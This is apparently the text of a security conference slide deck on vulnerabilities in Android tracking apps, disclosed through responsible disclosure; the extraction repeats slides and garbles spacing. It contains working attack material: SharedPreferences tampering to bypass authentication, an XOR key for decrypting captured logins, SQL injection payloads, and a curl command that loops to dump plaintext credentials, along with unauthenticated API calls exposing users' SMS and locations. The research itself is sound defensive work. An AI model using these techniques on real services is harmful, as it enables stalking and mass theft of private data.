/> <boolean name="l_fb_full" value="false" /> <boolean name="l_loc" value="false" /> <boolean name="l_sms" value="false" /> <boolean name="l_ads" value="false" /> <boolean name="l_sms_full" value="false" /> <boolean name="l_call" value="false" /> <boolean name="l_fb" value="false" /> WTF 1/4 – Enable Premium Features 35 1. Give me all SMS messages WTF 1/4 – Enable Premium Features 36 1. Give me all SMS messages 2. Ok: SMS1, SMS2, SMS3, … WTF 1/4 – Enable Premium Features 37 1. Give me all SMS messages 3. Client “Authorization” Check if(getBoolean(“l_sms_full”) == false) { String[] sms = getAllSMS(); … singleSMS = sms[i].substring(0, 50); } else { //return complete sms } 2. Ok: SMS1, SMS2, SMS3, … WTF 1/4 – Enable Premium Features 38 1. Give me all SMS messages 2. Ok: SMS1, SMS2, SMS3, … 3. Client “Authorization” Check if(getBoolean(“l_sms_full”) == false) { String[] sms = getAllSMS(); … singleSMS = sms[i].substring(0, 50); } else { //return complete sms } WTF 2/4 – Admin Privileges 39 • App1supports1two1modes: • parent1(controller/administration)1 • children1(monitored) • Administrator1can1create1new1Administrators • Administrator1can1monitor1all1children WTF 2/4 – Admin Privileges 40 • App1supports1two1modes: • parent1(controller/administration)1 • children1(monitored) • Administrator1can1create1new1Administrators • Administrator1can1monitor1all1children ???? WTF 2/4 – Admin Privileges 41 • App1supports1two1modes: • parent1(controller/administration)1 • children1(monitored) • Administrator1can1create1new1Administrators • Administrator1can1monitor1all1children <boolean name="isLogin" value="true" /> <boolean name="isParent" value="true" /> WTF 3/4 - Remove Lockscreen 42 WTF 3/4 - Remove Lockscreen 43 § After1app1start1the1lock1screen1asks1for1pin ???? Remove Lockscreen 44 § After1app1start1the1lock1screen1asks1for1pin § To1remove1the1lock1screen,1change1SharedPreferencevalue1from1 true to1false <boolean name="pflag" value="true" /> <boolean name="pflag" value="false" /> WTF 4/4 – Authentication Bypass 45 § Same1works with login,1no password required <boolean name="isLogin" value="false" /> <boolean name="isLogin" value="true" /> 46 Do not use SharedPreferences for authorization checks!! Agenda 47 § Introduction/Motivation § Background Information § Bad Client-Side Checks with SharedPreferences § Client-Side and Communication Vulnerabilities § Server-Side Vulnerabilities § Responsible Disclosure Process § Summary Mitm Attack 101 user/app tracking provider (backend/cloud) DATA DATA Mitm Attack 101 user/app tracking provider (backend/cloud) DATA DATA DATA Mitm Attack 101 user/app tracking provider (backend/cloud) DATA DATA DATA Mitm Attack 101 user/app tracking provider (backend/cloud) DATA DATA DATA Mitm Attack 101 user/app tracking provider (backend/cloud) DATA DATA DATA Mitm Attack 101 user/app tracking provider (backend/cloud) DATA DATA DATA Mitm Attack 101 user/app tracking provider (backend/cloud) DATA DATA DATA Mitm Attack 101 user/app tracking provider (backend/cloud) Mitm Attack 101 user/app tracking provider (backend/cloud) evil twin Mitm Attack 101 user/app tracking provider (backend/cloud) evil twin victims view Mitm Attack 101 user/app tracking provider (backend/cloud) DATA DATA DATA DATA evil twin victims view DATA Mitm + Bad Crypto + Obfuscation 59 ?? Mitm + Bad Crypto + Obfuscation 60 ?? user@example.com secure123 Mitm + Bad Crypto + Obfuscation 61 GET /login/?aaa=Bi9srqo&nch=DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A& tnd=CFF1CxQoaQcoLWoRaQ%3D%3D%0A HTTP/1.1 http://s9.***********.com/login/?aaa... Mitm + Bad Crypto + Obfuscation 62 GET /login/? aaa=Bi9srqo& nch=DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A& tnd=CFF1CxQoaQcoLWoRaQ%3D%3D%0A HTTP/1.1 1. user@example.com secure123 Mitm + Bad Crypto + Obfuscation 63 GET /login/? aaa=Bi9srqo& nch=DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A& tnd=CFF1CxQoaQcoLWoRaQ%3D%3D%0A HTTP/1.1 GET /login/? ssp=CFF1CxQoaQcoLWoRaQ%3D%3D%0A& eml=4hBWVqJg4D& mix=DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A HTTP/1.1 1. 2. user@example.com secure123 Mitm + Bad Crypto + Obfuscation 64 GET /login/? aaa=Bi9srqo& nch=DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A& tnd=CFF1CxQoaQcoLWoRaQ%3D%3D%0A HTTP/1.1 GET /login/? ssp=CFF1CxQoaQcoLWoRaQ%3D%3D%0A& eml=4hBWVqJg4D& mix=DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A HTTP/1.1 GET /login/? psw=-ZI-WQe& amr=DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A& rma=CFF1CxQoaQcoLWoRaQ%3D%3D%0A HTTP/1.1 1. 2. 3. user@example.com secure123 Mitm + Bad Crypto + Obfuscation 65 GET /login/? aaa=Bi9srqo& nch=DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A& tnd=CFF1CxQoaQcoLWoRaQ%3D%3D%0A HTTP/1.1 GET /login/? ssp=CFF1CxQoaQcoLWoRaQ%3D%3D%0A& eml=4hBWVqJg4D& mix=DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A HTTP/1.1 GET /login/? psw=-ZI-WQe& amr=DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A& rma=CFF1CxQoaQcoLWoRaQ%3D%3D%0A HTTP/1.1 GET /login/? aaa=ZTZrO& mag=DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A& df=CFF1CxQoaQcoLWoRaQ%3D%3D%0A& data=5JFJzgYW_ HTTP/1.1 1. 2. 3. 4. user@example.com secure123 Mitm + Bad Crypto + Obfuscation 66 GET /login/? aaa=Bi9srqo& nch=DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A& tnd=CFF1CxQoaQcoLWoRaQ%3D%3D%0A HTTP/1.1 GET /login/? ssp=CFF1CxQoaQcoLWoRaQ%3D%3D%0A& eml=4hBWVqJg4D& mix=DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A HTTP/1.1 GET /login/? psw=-ZI-WQe& amr=DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A& rma=CFF1CxQoaQcoLWoRaQ%3D%3D%0A HTTP/1.1 GET /login/? aaa=ZTZrO& mag=DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A& df=CFF1CxQoaQcoLWoRaQ%3D%3D%0A& data=5JFJzgYW_ HTTP/1.1 1. 2. 3. 4. user@example.com secure123 Mitm + Bad Crypto + Obfuscation 67 GET /login/? aaa=Bi9srqo& nch=DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A& tnd=CFF1CxQoaQcoLWoRaQ%3D%3D%0A HTTP/1.1 GET /login/? ssp=CFF1CxQoaQcoLWoRaQ%3D%3D%0A& eml=4hBWVqJg4D& mix=DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A HTTP/1.1 GET /login/? psw=-ZI-WQe& amr=DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A& rma=CFF1CxQoaQcoLWoRaQ%3D%3D%0A HTTP/1.1 GET /login/? aaa=ZTZrO& mag=DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A& df=CFF1CxQoaQcoLWoRaQ%3D%3D%0A& data=5JFJzgYW_ HTTP/1.1 1. 2. 3. 4. user@example.com secure123 Mitm + Bad Crypto + Obfuscation 68 nch = DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A tnd = CFF1CxQoaQcoLWoRaQ%3D%3D%0A aaa=Bi9srqo ssp = CFF1CxQoaQcoLWoRaQ%3D%3D%0A mix = DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A eml=4hBWVqJg4D amr = DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A rma = CFF1CxQoaQcoLWoRaQ%3D%3D%0A psw=-ZI-WQe mag = DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A df = CFF1CxQoaQcoLWoRaQ%3D%3D%0A aaa=ZTZrO data=5JFJzgYW_ Mitm + Bad Crypto + Obfuscation 69 mag = DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A tnd = CFF1CxQoaQcoLWoRaQ%3D%3D%0A ssp = CFF1CxQoaQcoLWoRaQ%3D%3D%0A rma = CFF1CxQoaQcoLWoRaQ%3D%3D%0A df = CFF1CxQoaQcoLWoRaQ%3D%3D%0A amr = DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A mix = DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A nch = DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A Mitm + Bad Crypto + Obfuscation 70 mag = DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A tnd = CFF1CxQoaQcoLWoRaQ%3D%3D%0A ssp = CFF1CxQoaQcoLWoRaQ%3D%3D%0A rma = CFF1CxQoaQcoLWoRaQ%3D%3D%0A df = CFF1CxQoaQcoLWoRaQ%3D%3D%0A amr = DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A mix = DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A nch = DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A 'k',1'c',1'#',1'a',1'p',1'p',1'#',1'k',1'e',1'y',1'#'} Mitm + Bad Crypto + Obfuscation 71 mag = DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A tnd = CFF1CxQoaQcoLWoRaQ%3D%3D%0A ssp = CFF1CxQoaQcoLWoRaQ%3D%3D%0A rma = CFF1CxQoaQcoLWoRaQ%3D%3D%0A df = CFF1CxQoaQcoLWoRaQ%3D%3D%0A amr = DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A mix = DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A nch = DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A 'k',1'c',1'#',1'a',1'p',1'p',1'#',1'k',1'e',1'y',1'#'} XOR @ user@example.com Base64 Mitm + Bad Crypto + Obfuscation 72 mag = DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A tnd = CFF1CxQoaQcoLWoRaQ%3D%3D%0A ssp = CFF1CxQoaQcoLWoRaQ%3D%3D%0A rma = CFF1CxQoaQcoLWoRaQ%3D%3D%0A df = CFF1CxQoaQcoLWoRaQ%3D%3D%0A amr = DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A mix = DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A nch = DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A 'k',1'c',1'#',1'a',1'p',1'p',1'#',1'k',1'e',1'y',1'#'} XOR @ user@example.com Base64 {nl,1bhf,1mag,1bdt,1qac,1trn,1amr,1mix,1nch} Mitm + Bad Crypto + Obfuscation 73 mag = DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A tnd = CFF1CxQoaQcoLWoRaQ%3D%3D%0A ssp = CFF1CxQoaQcoLWoRaQ%3D%3D%0A rma = CFF1CxQoaQcoLWoRaQ%3D%3D%0A df = CFF1CxQoaQcoLWoRaQ%3D%3D%0A amr = DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A mix = DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A nch = DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A 'k',1'c',1'#',1'a',1'p',1'p',1'#',1'k',1'e',1'y',1'#'} XOR @ user@example.com Base64 {nl,1bhf,1mag,1bdt,1qac,1trn,1amr,1mix,1nch} Random() “=“ + + Mitm + Bad Crypto + Obfuscation 74 mag = DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A tnd = CFF1CxQoaQcoLWoRaQ%3D%3D%0A ssp = CFF1CxQoaQcoLWoRaQ%3D%3D%0A rma = CFF1CxQoaQcoLWoRaQ%3D%3D%0A df = CFF1CxQoaQcoLWoRaQ%3D%3D%0A amr = DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A mix = DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A nch = DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A XOR Base64 {nl,1bhf,1mag,1bdt,1qac,1trn,1amr,1mix,1nch} Random() “=“ + + {df,1ssp,1fgh,1 drt,1tnd,1rfb,1rma,1vwe,1hac} secure123 ******** Random() “=“ + + 'k',1'c',1'#',1'a',1'p',1'p',1'#',1'k',1'e',1'y',1'#'} user@example.com @ Decryption 75 CFF1CxQoaQcoLWoRaQ%3D%3D%0A DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A Decode Base64 Decryption 76 CFF1CxQoaQcoLWoRaQ%3D%3D%0A DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A XOR Decode Base64 secure123 ******** 'k',1'c',1'#',1'a',1'p',1'p',1'#',1'k',1'e',1'y',1'#'} user@example.com @ Mitm + Bad Crypto + Obfuscation 77 tnd = CFF1CxQoaQcoLWoRaQ%3D%3D%0A nch = DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A @ ******** Mitm + Bad Crypto + Obfuscation 78 tnd = CFF1CxQoaQcoLWoRaQ%3D%3D%0A nch = DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A @ ******** aaa=Bi9srqo eml=4hBWVqJg4D aaa=ZTZrO data=5JFJzgYW_ psw=-ZI-WQe Mitm + Bad Crypto + Obfuscation 79 tnd = CFF1CxQoaQcoLWoRaQ%3D%3D%0A nch = DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A @ ******** aaa=Bi9srqo eml=4hBWVqJg4D psw=-ZI-WQe aaa=ZTZrO data=5JFJzgYW_ {usr,1psw,1uid,1data,1eml,1pss,1foo,1clmn,1count,1nam,1srv,1answ,1aaa1} Random() “=“ + + GenerateRandomString() Mitm + Bad Crypto + Obfuscation 80 tnd = CFF1CxQoaQcoLWoRaQ%3D%3D%0A nch = DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A @ ******** aaa=Bi9srqo eml=4hBWVqJg4D psw=-ZI-WQe aaa=ZTZrO data=5JFJzgYW_ {usr,1psw,1uid,1data,1eml,1pss,1foo,1clmn,1count,1nam,1srv,1answ,1aaa1} Random() “=“ + + GenerateRandomString() GenerateMultiPairs() Mitm + Bad Crypto + Obfuscation 81 tnd = CFF1CxQoaQcoLWoRaQ%3D%3D%0A nch = DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A @ ******** aaa=Bi9srqo Shuffle() GET /login/? aaa=Bi9srqo& nch=DzttDRMbYQcAPmUfAGQZHDxOJRMbclZeKQ%3D%3D%0A& tnd=CFF1CxQoaQcoLWoRaQ%3D%3D%0A HTTP/1.1 82 Correct Secure Communication § Use1https via1TLSQ1.2Qor1TLSQ1.3 § Valid1server1certificate1 § Implementation1in1Android: URL url = new URL("https://wikipedia.org"); URLConnection urlConnection = url.openConnection(); val url = URL("https://wikipedia.org") val urlConnection: URLConnection = url.openConnection() Java: https://developer.android.com/training/articles/security-ssl#java Kotlin: 84 Realy ? “Authentication“ “Authentication“ … Message message = new Message(); try { Class.forName("com.mysql.jdbc.Driver"); Connection con = DriverManager. getConnection( ); try { … “Authentication“ … Message message = new Message(); try { Class.forName("com.mysql.jdbc.Driver"); Connection con = DriverManager. getConnection("jdbc:mysql://mysql.r*****************r.mobi/r*************06", "r*************06", "t**********b"); try { … “Authentication“ … Message message = new Message(); try { Class.forName("com.mysql.jdbc.Driver"); Connection con = DriverManager. getConnection("jdbc:mysql://mysql.r*****************r.mobi/r*************06", "r*************06", "t**********b"); try { … database address “Authentication“ … Message message = new Message(); try { Class.forName("com.mysql.jdbc.Driver"); Connection con = DriverManager. getConnection("jdbc:mysql://mysql.r*****************r.mobi/r*************06", "r*************06", "t**********b"); try { … database address username password “Authentication“ … Message message = new Message(); try { Class.forName("com.mysql.jdbc.Driver"); Connection con = DriverManager. getConnection("jdbc:mysql://mysql.r*****************r.mobi/r*************06", "r*************06", "t**********b"); try { … database address username password “Authentication“ § MySQL1Database1with following table scheme: Field Type Null Key Default Extra nome varchar(50) NO NULL email varchar(30) NO NULL latitude varchar(30) NO NULL longitude varchar(30) NO NULL data varchar(30) NO NULL hora varchar(30) NO NULL codrenavam varchar(30) NO NULL placa Varchar(30) NO PRI NULL “Authentication“ § MySQL1Database1with following table scheme: Field Type Null Key Default Extra nome varchar(50) NO NULL email varchar(30) NO NULL latitude varchar(30) NO NULL longitude varchar(30) NO NULL data varchar(30) NO NULL hora varchar(30) NO NULL codrenavam varchar(30) NO NULL placa Varchar(30) NO PRI NULL “Authentication“ § MySQL1Database1with following table scheme: Field Type Null Key Default Extra nome varchar(50) NO NULL email varchar(30) NO NULL latitude varchar(30) NO NULL longitude varchar(30) NO NULL data varchar(30) NO NULL hora varchar(30) NO NULL codrenavam varchar(30) NO NULL placa Varchar(30) NO PRI NULL “Authentication“ … Message message = new Message(); try { Class.forName("com.mysql.jdbc.Driver"); Connection con = DriverManager. getConnection("jdbc:mysql://mysql.r*****************r.mobi/r*************06", "r*************06", "t**********b"); try { … database address username password All1in1all1we had access to over 860.000 location data of different1user,1distributed over the whole world. Prepared Statement ? WTF ! … Message message = new Message(); try { Class.forName("com.mysql.jdbc.Driver"); Connection con = DriverManager. getConnection("jdbc:mysql://mysql.r*****************r.mobi/r*************06", "r*************06", "t**********b"); try { PreparedStatement prest = con.prepareStatement("insert rastreadorpessoal values(?)"); 96 Is that all ? Prepared Statement ? WTF ! … Message message = new Message(); try { Class.forName("com.mysql.jdbc.Driver"); Connection con = DriverManager. getConnection("jdbc:mysql://mysql.r*****************r.mobi/r*************06", "r*************06", "t**********b"); try { PreparedStatement prest = con.prepareStatement("insert rastreadorpessoal values(?)"); prest.executeUpdate("insert into rastreadorpessoal values('" + this.atributos.getNome() + "', '" + this.atributos.getEmail() + "', '" + this.atributos.getLatitudeStr() + "', '" + this.atributos.getLongitudeStr() + "', '" + this.atributos.getDataBancoStr() + "', '" + this.atributos.getHoraBancoStr() + "', '" + this.atributos.getRenavam() + "', '" + this.atributos.getPlaca() + "')"); prest.close(); con.close(); … Prepared Statement ? WTF ! … Message message = new Message(); try { Class.forName("com.mysql.jdbc.Driver"); Connection con = DriverManager. getConnection("jdbc:mysql://mysql.r*****************r.mobi/r*************06", "r*************06", "t**********b"); try { PreparedStatement prest = con.prepareStatement("insert rastreadorpessoal values(?)"); prest.executeUpdate("insert into rastreadorpessoal values('" + this.atributos.getNome() + "', '" + this.atributos.getEmail() + "', '" + this.atributos.getLatitudeStr() + "', '" + this.atributos.getLongitudeStr() + "', '" + this.atributos.getDataBancoStr() + "', '" + this.atributos.getHoraBancoStr() + "', '" + this.atributos.getRenavam() + "', '" + this.atributos.getPlaca() + "')"); prest.close(); con.close(); … 99 Stupid ! Agenda 100 § Introduction/Motivation § Background Information § Bad Client-Side Checks with SharedPreferences § Client-Side and Communication Vulnerabilities § Server-Side Vulnerabilities § Responsible Disclosure Process § Summary 101 101 1. Authentication Request 2. Authorization Request WTF-States of Server-Side Vulnerabilties 102 103 “ Thats a feature “ Not a Bug it‘s a Feature § Web1service1provides1public1access1to1user1tracks,1allowQallQby1default Not a Bug it‘s a Feature § Web1service1provides1public1access1to1user1tracks,1allowQallQby1default Not a Bug it‘s a Feature https://www.greenalp.com/realtimetracker/index.php?viewuser=USERNAME 107 Demo Time ! 108 Is that all ? Public Webinterface 110 Authentication – What? Part1: Who Needs Authentication? http://***********g.azurewebsites.net/trackapplochistory.aspx?userid=********&childid=2********0& currentdate=07/12/2017 Part1: Who Needs Authentication? http://***********g.azurewebsites.net/trackapplochistory.aspx?userid=********&childid=2********0& currentdate=07/12/2017 nothing new Part1: Who Needs Authentication? http://***********g.azurewebsites.net/trackapplochistory.aspx?userid=********&childid=2********0& currentdate=07/12/2017 your user id nothing new Part1: Who Needs Authentication? http://***********g.azurewebsites.net/trackapplochistory.aspx?userid=********&childid=2********0& currentdate=07/12/2017 your user id id1of1the1person1to1track nothing new Part1: Who Needs Authentication? http://***********g.azurewebsites.net/trackapplochistory.aspx?userid=********&childid=2********0& currentdate=07/12/2017 your user id id1of1the1person1to1track requested1date nothing new Part1: Who Needs Authentication? attacker tracker backend Response1for http://***********g.azurewebsites.net/... 07:471PM*49.8715330929084,8.639047788304 07:521PM*49.8731935027927,8.63498598738923 07:531PM*49.871533247265,8.63904788614738 … List1of the complete track Part1: Who Needs Authentication? Part2: Who Needs Authentication? § Tracker1has1messenger1functions,1e.g.1send1messages1or1exchange1 images § How1do1we1get1the1messages1for1a1user1? Part2: Who Needs Authentication? § Tracker1has1messenger1functions,1e.g.1send1messages1or1exchange1 images § How1do1we1get1the1messages1for1a1user1? attacker tracker backend POST1/***************/api/get_sms HTTP/1.1 {"cnt":"100","user_id":"123456"} result counter Part2: Who Needs Authentication? § Tracker1has1messenger1functions,1e.g.1send1messages1or1exchange1 images § There1is1no1authentication,1all1messages11! attacker tracker backend List1of sms with: • user_id • timestamp • content • phone number Part2: Who Needs Authentication? § What1happens1if1user_id is1empty1? attacker tracker backend POST1/***************/api/get_sms HTTP/1.1 {"cnt":"100","user_id":""} Part2: Who Needs Authentication? § What happens if user_id is empty ? attacker tracker backend AllQSMSQof allQusers ! 123 SQL – Very Simple Backend Attack to Track all User http://*********/FindMyFriendB/fetch_family.php?mobile=<mobileQ number> Backend1API extraction Backend Attack to Track all User [{"to_username":“*****","to_mobile":"9********9","lat":"*0.2916455"," lon":"7*.0521764","time":"12:0,27-12-2016"}] http://*********/FindMyFriendB/fetch_family.php?mobile=<mobileQ number> Backend1API extraction Simple SQL Injection http://*********/FindMyFriendB/fetch_family.php?mobile='Q or ''Q=' Backend1API extraction Simple SQL Injection http://*********/FindMyFriendB/fetch_family.php?mobile='Q or ''Q=' Backend1API extraction [{"to_username":“***","to_mobile":"9********4","lat":"2*.644490000000005","lon":"*8.35368","time":"18:55,04-12- 2016"},{"to_username":“****","to_mobile":"9******9","lat":“*0.2916455","lon":“*8.0521764","time":"12:0,27-12- 2016"},{"to_username":“****","to_mobile":"9********2","lat":“*3.8710253","lon":“*5.6093338","time":"18:6,19-11- 2016"},{"to_username":“****","to_mobile":"9*******2","lat":“*6.5958902","lon":"-*7.3897167","time":"13:46,04-12- 2016"},{"to_username":“****","to_mobile":"9*******0","lat":“*2.621241065689713","lon":“*8.33497756126259","time":"9:2 5,20-11-2016"},{"to_username":“****","to_mobile":"4********1","lat":“*1.8925267","lon":"-*1.3928747","time":"3:26,12- 022017"},{"to_username":"","to_mobile":"","lat":"","lon":"","time":""},{"to_username":“***","to_mobile":"9********8", "lat":“*5.262387837283313","lon":“*4.10851701162755","time":"23:47,20-11- 2016"},{"to_username":“****","to_mobile":"9*******6","lat":"0","lon":"0","time":"12:35"},{"to_username":“***","to_mob ile":"8********5","lat":“*5.3401165","lon":“*5.1459643","time":"8:45,21-11- 2016"},{"to_username":“****","to_mobile":"8********8","lat":"0","lon":"0","time":"0:32"},{"to_username":“****","to_mo bile":"9********2","lat":“*2.4393024","lon":"-*5.0414924","time":"23:0,20-11- 2016"},{"to_username":“****","to_mobile":"9********8","lat":“*2.4386613","lon":"-*5.0398665","time":"7:14,21-11- 2016"},{"to_username":“****","to_mobile":"8********6","lat":“*3.7005867","lon":“*6.9793598","time":"17:33,24-12- 2016"},{"to_username":“****","to_mobile":"8********5","lat":“*2.584631","lon":“*8.2787425","time":"20:56,22-11- 2016"},{"to_username":“*****","to_mobile":"8********1","lat":“*2.7993167","lon":“*6.2369126","time":"17:49,26-11- 2016"},{"to_username":“****","to_mobile":"9*******5","lat":“*2.5846746","lon":“*8.2787492","time":"18:28,21-11- 2016"},{"to_username":“***","to_mobile":"8*******7","lat":“*2.4069115","lon":"-*1.1435983",... 128 SQL - Simple Accessing Images § Cloud1storage for images Accessing Images § Cloud1storage for images § “One cloud“1for all1images Accessing Images § Cloud1storage for images § “One cloud“1for all1images § User1authentication required § Filter1correspondingimages by user id Accessing Images § Cloud1storage for images § One cloud for all1images § User1authentication required § Filter1correspondingimages by user id § Compromise the cloud to get access to all1images 133 Demo Time ! Get all User Credentials § App1provides1an1API1and1a1process1for1reinstallation1of1the1app 1. App1checks1if1user1already1has1an1account 2. Sends1device1id1to1the1server POST1http://push001.***********/***********/v5/ Content-Type:1application/json {"method":"getuserid","deviceid":"c1b86d87ed6f51011c0d53a654f16455"} Get all User Credentials § App1provides1an1API1and1a1process1for1reinstallation1of1the1app 1. App1checks1if1user1already1has1an1account 2. Sends1device1id1to1the1server 3. Server1checks1if1id1exists1and1responses1with: username,QpasswordQandQemail POST1http://push001.***********/***********/v5/ Content-Type:1application/json {"method":"getuserid","deviceid":"c1b86d87ed6f51011c0d53a654f16455"} Attack Strategy § Spoofing the device id will1deliver us credentialsBUT device id generation is relative1complex and guessing is unlikely Attack Strategy § Spoofing the device id will1deliver us credentialsBUT device id generation is relative1complex and guessing is unlikely § Empty1id trick does not1work L POST1http://push001.***********/***********/v5/ Content-Type:1application/json {"method":"getuserid","deviceid":" "} Attack Strategy § Spoofing the device id will1deliver us credentials § BUT1device id generation is relative1complex and guessing is unlikely § Empty1id trick does not1work L § Let‘s try SQL1injection again J POST1http://push001.***********/***********/v5/ Content-Type:1application/json {"method":"getuserid","deviceid":" 'Qor 1=1QQQlimit 1Qoffset 5Q-- "} SQL-Injection § Curl Command: curl -H "Content-Type: application/json" -X POST -d "{\"method\":\"getuserid\", \"deviceid\":\" ' or 1=1 limit 1 offset 5 -- \"}" http://push001.***********/*********/v5/ SQL-Injection § Curl Command: § Result: curl -H "Content-Type: application/json" -X POST -d "{\"method\":\"getuserid\", \"deviceid\":\" ' or 1=1 limit 1 offset 5 -- \"}" http://push001.***********/*********/v5/ {"result":"success", "id":"yb*****","pass":"y********4","email":"y*****@hanmail.net"} plaintext password SQL-Injection § Curl Command: § Result: curl -H "Content-Type: application/json" -X POST -d "{\"method\":\"getuserid\", \"deviceid\":\" ' or 1=1 limit 1 offset 6 -- \"}" http://push001.***********/*********/v5/ {"result":"success", "id":"se*****","pass":"qwe*******4","email":"se*****@gmail.com"} plaintext password iterate over the offset SQL-Injection § Curl Command: curl -H "Content-Type: application/json" -X POST -d "{\"method\":\"getuserid\", \"deviceid\":\" ' or 1=1 limit 1 offset 1700400 -- \"}" http://push001.***********/*********/v5/ iterate over the offset >Q1.700.000Qplaintext credentials 143 WTF ? Firebase https://firebase.google.com/ Authentication Misconfiguration attacker tracker backend http://*******/*****celltracker/api Authentication Misconfiguration attacker tracker backend POST1/*******celltracker/api/login HTTP/1.1 {"user_email":"foo@bar.com"} victim email Authentication Misconfiguration attacker tracker backend HTTP/1.112001OK {"login_data":[{"user_id":"149737514214639",…} Authorisation Misconfiguration attacker https://*****************.firebaseio.com/Users/149737514214639 Location without Authorisation attacker HTTP/1.112001OK { last_location={ address=1Rheinstraße1751642951Darmstadt1Germany date=13/06/2017 lat=49.8717048 long=8.6387116 … } Faceplam Light But there is More attacker HTTP/1.112001OK {1… user_email=foo@bar.com user_name=theuser user_password=123456 user_token=cQfgiDRWx9o:APA91bGTkU1N9F... user_type=1 .. } But there is More attacker HTTP/1.112001OK {1… user_email=foo@bar.com user_name=theuser user_password=123456 user_token=cQfgiDRWx9o:APA91bGTkU1N9F... user_type=1 .. } But there is More HTTP/1.112001OK {1… user_email=foo@bar.com user_name=theuser user_password=123456 user_token=cQfgiDRWx9o:APA91bGTkU1N9F... user_type=1 .. } public void onDataChange(DataSnapshot dataSnapshot) { PasswordActivity.this.util.log("userid password123", "" + dataSnapshot.getValue()); if(PasswordActivity.get_string_from_edittext(PasswordActivity.ed_password).compareToIgnoreCase( dataSnapshot.getValue().toString()) == 0) { .... PasswordActivity.this.save_user_data(); return; } PasswordActivity.lDialog.dismiss(); PasswordActivity.this.util.toast("Password Wrong"); } But there is More HTTP/1.112001OK {1… user_email=foo@bar.com user_name=theuser user_password=123456 user_token=cQfgiDRWx9o:APA91bGTkU1N9F... user_type=1 .. } public void onDataChange(DataSnapshot dataSnapshot) { PasswordActivity.this.util.log("userid password123", "" + dataSnapshot.getValue()); if(PasswordActivity.get_string_from_edittext(PasswordActivity.ed_password).compareToIgnoreCase( dataSnapshot.getValue().toString()) == 0) { .... PasswordActivity.this.save_user_data(); return; } PasswordActivity.lDialog.dismiss(); PasswordActivity.this.util.toast("Password Wrong"); } But there is More HTTP/1.112001OK {1… user_email=foo@bar.com user_name=theuser user_password=123456 user_token=cQfgiDRWx9o:APA91bGTkU1N9F... user_type=1 .. } public void onDataChange(DataSnapshot dataSnapshot) { PasswordActivity.this.util.log("userid password123", "" + dataSnapshot.getValue()); if(PasswordActivity.get_string_from_edittext(PasswordActivity.ed_password).compareToIgnoreCase( dataSnapshot.getValue().toString()) == 0) { .... PasswordActivity.this.save_user_data(); return; } PasswordActivity.lDialog.dismiss(); 